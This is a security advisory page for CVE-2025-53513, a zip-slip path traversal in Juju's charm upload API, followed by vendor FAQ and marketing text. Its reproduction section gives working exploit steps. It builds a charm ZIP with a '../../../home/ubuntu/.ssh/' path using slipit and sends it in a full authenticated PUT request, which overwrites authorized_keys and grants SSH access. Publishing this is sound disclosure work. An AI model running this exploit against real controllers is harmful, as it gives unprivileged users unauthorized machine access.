Summary
Details
A controller exposes three charm-related HTTP API endpoints, as follows:
- PUT/GET https://:17070/model-/charms/-
- POST/GET https://:17070/model-/charms
- GET https://:17070/charms
These endpoints require Basic HTTP authentication credentials and will accept any valid user within the context of the controller. A user that has no specific permission or access granted can call all of these APIs.
To reproduce:
juju bootstrap
juju add-user testuser
juju change-user-password testuser
Download the ZIP file of an arbitrary charm eg https://github.com/juju/hello-juju-charm
Download and install the following tool: https://github.com/usdAG/slipit
Run the following command to generate a new SSH key pair: ssh-keygen
Copy the contents of the newly created public key into a file called authorized_keys
Run the following command to inject the malicious path into the ZIP file:
slipit hello.zip authorized_keys --separator ../../../../../../home/
ubuntu/.ssh/
Send the PUT request below to a model on the target controller. Note the following:
- the model UUID and controller IP address in the request must be updated
- the Juju-Curl header needs to be sent with a value that starts with the “local:” string
- the PUT body content should have the exact contents of the ZIP file
- the Basic Authorization header should be tied to the user that was created above
- the first time that the request is sent, an error will be returned that states that the SHA hash in the URL is invalid. When this occurs, copy the value in the response and replace it in the final part of the URL (i.e.
pathtw-<updated-sha>)
PUT /model-34bb5ef0-5a3e-41d7-873c-2f884adf606d/charms/pathtw-5c9f25c
HTTP/1.1
Host: 10.4.154.217:17070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko
/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Length: 40021
Content-Type: application/zip
Juju-Curl: local:pathtw
Authorization: Basic dXNlci10ZXN0dXNlcjpwYXNzd29yZA==
<ZIP BODY Content>
Observe that the response states that the charm has been uploaded.
Attempt to SSH to the controller by using the private key that was generated above.
Observe that it is possible to authenticate because the file has been overwritten.
Code
The /charms handlers are registered here
https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L897
https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L990
And the only auth required is that the incoming request be for an authenticated user
https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L754
but no specific permission checks are done.
Workarounds
There are no known workarounds.
References
Impact
Any user with a Juju account on a controller can upload a charm to the /charms endpoint.
No specific permissions are required - it's just sufficient for the user to exist in the controller user database.
A charm which exploits the zip slip vulnerability may be used to allow such a user to get access to a machine running a unit using the affected charm.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2025-53513 has a CVSS score of 8.8 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20250619215741-6356e984b82a); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-53513? CVE-2025-53513 is a high-severity path traversal vulnerability in github.com/juju/juju (go), affecting versions < 0.0.0-20250619215741-6356e984b82a. It is fixed in 0.0.0-20250619215741-6356e984b82a. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2025-53513? CVE-2025-53513 has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/juju/juju are affected by CVE-2025-53513? github.com/juju/juju (go) versions < 0.0.0-20250619215741-6356e984b82a is affected.
- Is there a fix for CVE-2025-53513? Yes. CVE-2025-53513 is fixed in 0.0.0-20250619215741-6356e984b82a. Upgrade to this version or later.
- Is CVE-2025-53513 exploitable, and should I be worried? Whether CVE-2025-53513 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-53513 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-53513? Upgrade
github.com/juju/jujuto 0.0.0-20250619215741-6356e984b82a or later.